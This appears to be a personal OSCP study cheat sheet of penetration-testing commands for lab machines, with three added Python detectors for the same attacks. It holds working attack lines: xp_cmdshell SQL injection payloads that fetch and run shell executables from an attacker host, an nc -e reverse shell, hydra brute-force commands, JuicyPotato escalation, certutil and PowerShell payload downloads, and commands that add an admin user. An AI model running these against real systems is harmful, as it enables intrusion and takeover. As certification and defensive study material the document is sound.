OSCP Methodology
Enumeration/Footholds:
**all services try default credentials: admin/admin, root/root, admin/password, root/password
- find a good small wordlist to do this with
***all services: admin/root/password/<service name>/users/<blank>, etc.
*take all files available on ports (ftp, smb, etc.) binwalk and examine.
Port Enumeration:
ports=$(nmap -p- --min-rate=1000 -T4 192.168.178.99 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) && nmap -sC -sV -p$ports 192.168.178.99 | tee nmap.txt
sudo $(which autorecon) <ip> : check udp
echo abc | nc <ip> <port>
*** Enumerate all ports, banner grab, google results (see 10.1.1.89)
Tips:
**Full enumeration on all ports, search different wording for services, see 10.1.1.65. Google responses, etc.
**Box hostname could give hint to exploit path
Web Enumeration:
*immediately run dirb and nikto. Run wfuzz to get dirs then use dirbuster.
nmap <ip> --script=http-enum.nse
nikto -h <ip> | tee nikto.txt
dirb <ip> <wordlist> (common.txt, small.txt, medium.txt)
dirb http://10.11.1.39/cgi-bin/ /usr/share/wordlists/dirb/common.txt -X .sh | tee dirb2.txt
dirbuster (use medium list or try different extensions, like sh, if you don't find anything)
ffuf -c -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://localhost:9885/FUZZ
gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://relevant.thm:49663
Soft 404s:
# use to see what the common 200 "soft 404" number of characters returns
wfuzz -w /usr/share/dirb/wordlists/common.txt --hc 404 http://192.168.178.99:8089/FUZZ
# shows 9 chars, use --hh 9 to exclude 200 responses with 9 characters
wfuzz -w /usr/share/dirb/wordlists/common.txt --hc 404 --hh 9 http://192.168.178.99:8089/FUZZ
wpscan --enumerate u --url http://funbox.fritz.box (enumerates users)
wpscan --enumerate ap --url http://192.168.152.77 | tee wpscan.txt (aggressive too)
Subdomain enum:
wfuzz -c -w /opt/Seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://cmess.thm -H "Host: FUZZ.cmess.thm"
See what the word count is; in the example it's 290, put this in --hw to exclude it
wfuzz -c -w /opt/Seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://cmess.thm -H "Host: FUZZ.cmess.thm" --hw 290
Add domain to /etc/hosts
Tips:
*any files found in other services, check for it in the webservers. Especially an ftp or smb that you can upload to, see if that path exists on the website
*Burpsuite to modify requests, see nickel.
*Check https certificate for info
*Full enumeration on all web ports, no matter what; google what you get back
*check cookies, source code, js debugger, network, encoding
*file <file> on files, even after decoding, might be multiple layers of encoding.
*check for backup files, .bak, .backup, etc.
*/cgi-bin/ look for .sh files for shellshock
***check addons, like in /classes, /include, etc. and look them up on searchsploit/exploitdb
***brute force all users
Web Exploitation Enumeration:
*LFI/RFI: add %00 to end of file eg /etc/passwd%00
*Try to serve a shell in R/LFI in the file format the server uses, like a .cgi shell, .py, .php, etc.
*Check for default credentials
*webdav: davtest -url http://<ip>
**for cmd injection you may have to encode spaces, e.g. with ${IFS}
** check burpsuite or console to see responses to cmd injection
**Use name of box, use searchsploit, look through all pages!!! See clamav retired box.
Test if you have remote command execution by issuing ping <ip>, then listen with tcpdump: tcpdump -i tun0 icmp
**can just inspect if there is a password as dots.
SQL Injection
https://portswigger.net/web-security/sql-injection/cheat-sheet
linux/mysql:
a' OR 1=1; #
Windows/mssql: (see DJ box)
a' OR 1=1 --
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md#mssql-read-file
a' UNION SELECT 1,2; EXEC sp_configure 'show advanced options', 1 --
a' UNION SELECT 1,2; EXEC sp_configure 'xp_cmdshell', 1 --
a' UNION SELECT 1,2; RECONFIGURE --
a' UNION SELECT 1,2; EXEC xp_cmdshell "ping -n 1 192.168.119.130" -- (wireshark showed it worked)
a' UNION SELECT 1,2; EXEC xp_cmdshell "copy \\192.168.119.130\share\shell443.exe C:\shell.exe" --
a' UNION SELECT 1,2; EXEC xp_cmdshell "C:\shell.exe" --
Tips:
*May have to mess with format, ex: a',1); SELECT 1 -- from 10.11.1.229
SQL Foothold
With credentials from either other enumeration or brute forcing, try logging in. MSSQL can often lead to RCE through xp_cmdshell.
mssql-cli -U sa -P poiuytrewq -S 10.11.1.31
EXECUTE sp_configure 'show advanced options', 1; RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1; RECONFIGURE;
exec xp_cmdshell whoami
exec xp_cmdshell "copy \\192.168.119.130\share\shell443.exe ."
exec xp_cmdshell "shell443.exe"
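Detection-side counterpart for the xp_cmdshell chain above, added here as an example and not part of these notes: it scans SQL Server statement audit records for the enable-then-execute sequence, flagging a login that switches xp_cmdshell on and then runs it, and marking statements shaped like the stacked UNION payloads. The audit line layout is a constructed assumption.

```python
import re

# Constructed sample of SQL Server statement audit records (not real server
# output); the "ts login= stmt=" layout is an assumption made for this example.
SAMPLE_AUDIT = """\
2024-05-01T10:00:01Z login=webapp stmt=SELECT name FROM products WHERE id = 7
2024-05-01T10:00:02Z login=webapp stmt=SELECT 1,2; EXEC sp_configure 'show advanced options', 1
2024-05-01T10:00:03Z login=webapp stmt=SELECT 1,2; EXEC sp_configure 'xp_cmdshell', 1
2024-05-01T10:00:04Z login=webapp stmt=SELECT 1,2; RECONFIGURE
2024-05-01T10:00:05Z login=webapp stmt=SELECT 1,2; EXEC xp_cmdshell 'whoami'
2024-05-01T10:05:00Z login=dba stmt=EXEC sp_configure 'xp_cmdshell', 0
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) login=(?P<login>\S+) stmt=(?P<stmt>.*)$")
# sp_configure 'xp_cmdshell', 1 turns the feature on; setting it to 0 is the fix, not an alert
ENABLE_RE = re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1\b", re.I)
# EXEC xp_cmdshell ..., with or without a master..xp_cmdshell / master.dbo.xp_cmdshell prefix
EXEC_RE = re.compile(r"\bEXEC(?:UTE)?\s+(?:master\.(?:dbo)?\.)?xp_cmdshell\b", re.I)
# A SELECT carrying a stacked EXEC/RECONFIGURE is the shape of an injected payload
STACKED_RE = re.compile(r"^\s*SELECT\b.*;\s*(?:EXEC|RECONFIGURE)", re.I)


def find_xp_cmdshell_abuse(audit_text):
    """Return (login, kind, stmt) tuples. kind is 'enable' or 'exec';
    'exec' becomes 'exec:self-enabled' when the same login switched the
    feature on earlier in the audit, and ':stacked' is appended when the
    statement looks injected."""
    enabled_by = set()
    findings = []
    for line in audit_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        login, stmt = m["login"], m["stmt"]
        stacked = ":stacked" if STACKED_RE.search(stmt) else ""
        if ENABLE_RE.search(stmt):
            enabled_by.add(login)
            findings.append((login, "enable" + stacked, stmt))
        if EXEC_RE.search(stmt):
            kind = "exec:self-enabled" if login in enabled_by else "exec"
            findings.append((login, kind + stacked, stmt))
    return findings


if __name__ == "__main__":
    for login, kind, stmt in find_xp_cmdshell_abuse(SAMPLE_AUDIT):
        print(f"{kind:26} {login:8} {stmt}")
```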
SMB Enumeration
smbclient --no-pass -L //<IP>
smbclient --no-pass //<ip>/<share>
enum4linux -a <ip>
nmap --script smb-enum-users -p139,445 10.1.1.68
**from retired box, used found user to brute force other service
Edit config to allow older smb version negotiation if issue connecting:
edit /etc/samba/smb.conf, under [global]: client min protocol = LANMAN1
service smbd restart
Show samba version if not seen in commands:
sudo ngrep -i -d tun0 's..a..m..b..a.*[[:digit:]]'
smbclient --no-pass -L //10.11.1.115
Tips:
*Some samba exploits will work on samba versions even if exploit doesn't explicitly say that version
*See 10.11.1.136 for example of symlink traversal: https://github.com/roughiz/Symlink-Directory-Traversal-smb-manually
SSH Enumeration/Exploitation
If need a different ssh key negotiation/protocol (from 10.11.1.136), edit ~/.ssh/config:
Host 10.11.1.136
    Ciphers 3des-cbc
    KexAlgorithms +diffie-hellman-group1-sha1
    PubkeyAcceptedKeyTypes +ssh-dss
For exploitation add your pub key (/home/kali/.ssh/id_rsa.pub) to target's ~/.ssh/authorized_keys
If you get a private key, chmod 600 <key>
ssh -i dsa_key bob@10.11.1.136
Brute Forcing
Web forms:
hydra -L users.txt -P users.txt -f 10.11.1.227 http-get /localstart.asp
hydra -l admin -P ../rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=^USER^&password=^PASS^:nvalid" -V
(Use the POST string from inspector in browser to make sure you have all parameters) Ex:
hydra -l "root@localhost" -P /usr/share/wordlists/rockyou.txt 10.11.1.39 http-post-form "/otrs/index.pl:Action=Login&RequestedURL=&Lang=en&TimeOffset=240&User=^USER^&Password=^PASS^:login failed"
nmap -p80 --script http-form-brute 10.10.10.43 --script-args http-form-brute.hostname=10.10.10.43,http-form-brute.path=/department/login.php,http-form-brute.method=POST,uservar=username,passvar=password,http-form-brute.onfailure="nvalid"
Other Services:
hydra -l "joe" -P /usr/share/wordlists/rockyou.txt 192.168.152.77 ftp
hydra -l megan -P /usr/share/wordlists/wfuzz/others/common_pass.txt -I 10.1.1.27 ssh
hydra -l sa -P /usr/share/wordlists/rockyou.txt 10.1.1.68 mssql
hydra -L user.txt -P tv.txt 10.11.1.227 -s 27900 mssql (-s <port>)
hydra -L /usr/share/metasploit-framework/data/wordlists/sid.txt -s 1521 10.10.10.82 oracle-sid
Tips:
*use cewl to generate wordlists from websites
cewl http://192.168.122.49/index.html -w cewl.txt
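The other side of the hydra runs above, added here as an example and not part of these notes: a small detector over sshd auth-log lines that alerts on a burst of failed passwords from one source inside a time window and again when that source later logs in successfully (a guessed password). The log lines are a constructed sample with ISO timestamps.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sshd auth-log lines with ISO timestamps (the layout rsyslog's
# high-precision format writes); a sample, not a real capture.
SAMPLE_AUTH_LOG = """\
2024-05-01T10:00:01+00:00 host sshd[2011]: Failed password for invalid user megan from 203.0.113.5 port 51234 ssh2
2024-05-01T10:00:02+00:00 host sshd[2012]: Failed password for invalid user megan from 203.0.113.5 port 51235 ssh2
2024-05-01T10:00:03+00:00 host sshd[2013]: Failed password for megan from 203.0.113.5 port 51236 ssh2
2024-05-01T10:00:04+00:00 host sshd[2014]: Failed password for megan from 203.0.113.5 port 51237 ssh2
2024-05-01T10:00:05+00:00 host sshd[2015]: Failed password for megan from 203.0.113.5 port 51238 ssh2
2024-05-01T10:00:06+00:00 host sshd[2016]: Failed password for megan from 203.0.113.5 port 51239 ssh2
2024-05-01T10:00:07+00:00 host sshd[2017]: Accepted password for megan from 203.0.113.5 port 51240 ssh2
2024-05-01T10:30:00+00:00 host sshd[2100]: Failed password for joe from 198.51.100.9 port 40001 ssh2
"""

EVENT_RE = re.compile(
    r"^(?P<ts>\S+) \S+ sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def detect_brute_force(log_text, threshold=5, window_s=60):
    """Return (ip, kind, user) alerts. 'burst' fires once per source when
    `threshold` failures fall inside `window_s` seconds; 'success_after_burst'
    fires when that same source later authenticates successfully."""
    recent = defaultdict(deque)   # ip -> failure timestamps still inside the window
    tripped = set()
    alerts = []
    for line in log_text.splitlines():
        m = EVENT_RE.match(line)
        if not m:
            continue
        ts, ip, user = datetime.fromisoformat(m["ts"]), m["ip"], m["user"]
        if m["result"] == "Failed":
            window = recent[ip]
            window.append(ts)
            while (ts - window[0]).total_seconds() > window_s:
                window.popleft()          # drop failures older than the window
            if len(window) >= threshold and ip not in tripped:
                tripped.add(ip)
                alerts.append((ip, "burst", user))
        elif ip in tripped:
            alerts.append((ip, "success_after_burst", user))
    return alerts


if __name__ == "__main__":
    for ip, kind, user in detect_brute_force(SAMPLE_AUTH_LOG):
        print(f"{kind:20} {ip:15} last user tried: {user}")
```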
Mail Services
https://book.hacktricks.xyz/pentesting/pentesting-smtp
https://book.hacktricks.xyz/pentesting/pentesting-pop
telnet <ip> <110 | 25> (smtp/25 for sending, pop/110 or imap/143 for receiving)
nmap -sV 192.168.178.42 --script smtp-enum-users -p 25
Privilege Escalation:
General Tips:
Try known/easy credentials on privileged accounts
Check for internal services using netstat -anob
Run exploits multiple times
Try multiple kernel/OS exploits
look for ssh private keys or writeable authorized_keys files.
*** For reverse shells use port that is opened on machine, usually 443 or 80, but sometimes whatever web port they have open
Linux Privilege Escalation
Places to look: /var/www, /opt, .htpasswd
linpeas.sh
linux-exploit-suggester.sh
linenum.sh
Don't get stuck on any single one. Google kernel version for exploits.
SQL: mysql -D <database> -u <user> --password=<pass> --execute="show tables;"
SELECT * FROM <table>;
SUID, sudo -l, gtfobins
Try su to other users using their username as password, password, root, etc.
look for writeable scripts: .sh, .py, etc.
Crontabs: ls -la /etc/cron*; cat /etc/crontab
ps auxf
Pspy to list processes
Path injection: if a program running as higher priv calls a binary without the full path, try to make your own version of it and then include your current directory in path: PATH=.:$PATH
If you have access to a webserver that runs as root (see 10.11.1.141), add a shell in that server's file format and use an LFI to call it.
Commands to use when you have higher priv cmd execution:
nc <ip> <port> -e /bin/bash
Bash reverse shell, others, see payloadsallthethings
Add your public key to /root/.ssh/authorized_keys
gcc -m32 <file>.c -o <file> compile as 32bit.
gcc -m32 -Wl,--hash-style=both 9542.c -o 9542
For exploitation add your pub key (/home/kali/.ssh/id_rsa.pub) to target's ~/.ssh/authorized_keys **alternate if can't get shell
Tips:
***always guess easy passwords to su as another user: password, root, username, etc.
**When modifying a file called by some automatic process, you may have to try to catch it at different times when different users, potentially root, call it. See PG funbox. pspy to look at processes.
**Google any binaries in cron or running. Google <bin/file> privilege escalation.
Windows Privilege Escalation
python ~/tools/windows-exploit-suggester.py -i systeminfo.txt -d ~/tools/2021-10-01-mssb.xls
winpeas.exe, winpeas.bat
tasklist /v
sc query
**google OS version for exploits
whoami /priv : if SeImpersonatePrivilege you can probably use juicy potato or printspoofer
.\JuicyPotato.exe -l 6666 -p "c:\users\tony\shell.exe" -t *
.\JuicyPotato32.exe -l 6666 -c "{9B1F122C-2982-4e91-AA8B-E071D54F2A4D}" -p "c:\wamp\www\shell443.exe" -t *
Try hacktricks juicypotato link to interesting CLSIDs and try multiple ones
set PATH=%SystemRoot%\system32;%SystemRoot%; (a fix for if whoami doesn't work)
**Search all programs in program files
C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -ep bypass C:\users\tony\paperstream.ps1 (a full path to powershell if needed)
Mess around with payloads, usually windows/shell_reverse_tcp works best.
reg query HKLM /f pass /t REG_SZ /s
Command injection add admin user (can use this to login to rdp if rdp is open):
net user /add test testtest
net localgroup administrators test /add
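Detection-side counterpart for the two net commands above, added here as an example and not part of these notes: it correlates Windows Security events 4720 (user account created) and 4732 (member added to a security-enabled local group) by SID, alerting when a freshly created account lands in Administrators within a short gap. The flattened key=value export format is a constructed assumption; the field names follow the real event schema.

```python
from datetime import datetime

# Constructed Windows Security event records flattened to key=value fields
# (a sample, not a real export). Field names follow the event schema:
# 4720 = account created (TargetUserName/TargetSid); 4732 = member added to a
# security-enabled local group (group in TargetUserName, member in MemberSid).
SAMPLE_EVENTS = """\
2024-05-01T11:00:00Z EventID=4720 SubjectUserName=helpdesk TargetUserName=jsmith TargetSid=S-1-5-21-1-2-3-1201
2024-05-01T11:02:10Z EventID=4720 SubjectUserName=svc_web TargetUserName=test TargetSid=S-1-5-21-1-2-3-1202
2024-05-01T11:02:11Z EventID=4732 SubjectUserName=svc_web TargetUserName=Administrators MemberSid=S-1-5-21-1-2-3-1202
2024-05-01T11:10:00Z EventID=4732 SubjectUserName=helpdesk TargetUserName=Users MemberSid=S-1-5-21-1-2-3-1201
"""


def parse_event(line):
    """Split 'ts key=value ...' into a dict with a parsed 'ts' datetime."""
    ts, _, rest = line.partition(" ")
    fields = dict(kv.split("=", 1) for kv in rest.split())
    fields["ts"] = datetime.fromisoformat(ts.replace("Z", "+00:00"))
    return fields


def detect_new_local_admin(events_text, max_gap_s=600, groups=("Administrators",)):
    """Return one alert dict per account that was created (4720) and then added
    to one of `groups` (4732) within max_gap_s seconds, correlated by SID."""
    created = {}   # TargetSid -> (ts, actor, account name)
    alerts = []
    for line in events_text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        if ev["EventID"] == "4720":
            created[ev["TargetSid"]] = (ev["ts"], ev["SubjectUserName"], ev["TargetUserName"])
        elif ev["EventID"] == "4732" and ev["TargetUserName"] in groups:
            hit = created.get(ev["MemberSid"])
            if hit is None:
                continue          # member SID was not created in this log slice
            gap = (ev["ts"] - hit[0]).total_seconds()
            if gap <= max_gap_s:
                alerts.append({"actor": ev["SubjectUserName"], "account": hit[2],
                               "group": ev["TargetUserName"], "gap_s": gap})
    return alerts


if __name__ == "__main__":
    for a in detect_new_local_admin(SAMPLE_EVENTS):
        print(f"{a['actor']} created {a['account']} and added it to {a['group']} {a['gap_s']:.0f}s later")
```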
**make sure paying attention to paths: programdata vs program files, etc.
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#search-the-registry-for-key-names-and-passwords
https://book.hacktricks.xyz/windows/windows-local-privilege-escalation
File Transfer
wget http://<ip>:8000/<file>
sudo python3 smbserver.py share ./
copy \\10.10.14.13\share\<file>.exe .
If error about smb1: sudo python3 smbserver.py share ./ -smb2support
certutil -urlcache -split -f http://192.168.118.3/shell.dll shell.dll
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://192.168.49.103/shell80.dll','C:\\program files\\plantronics\\spokes3g\plugins\shell.dll')"
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://192.168.49.103/shell80.dll')"
C:/windows/temp/ C:/users/public/
to extract: base64 -w 0 <file> #only if smallish file, -w 0 gets rid of line wrapping
Process:
Run nmap, autorecon, dirb/nikto if immediate webserver.
**Run nmap multiple times, make sure you don't miss something
While scripts are running do initial recon on webserver or services most familiar with.
When scripts done, investigate http results, any ports that could give users or hints
**Fully investigate each port to identify the service.
Continue with webserver or familiar ports unless scripts point to obvious route.
If you hit a wall on those, go through each other service before going back.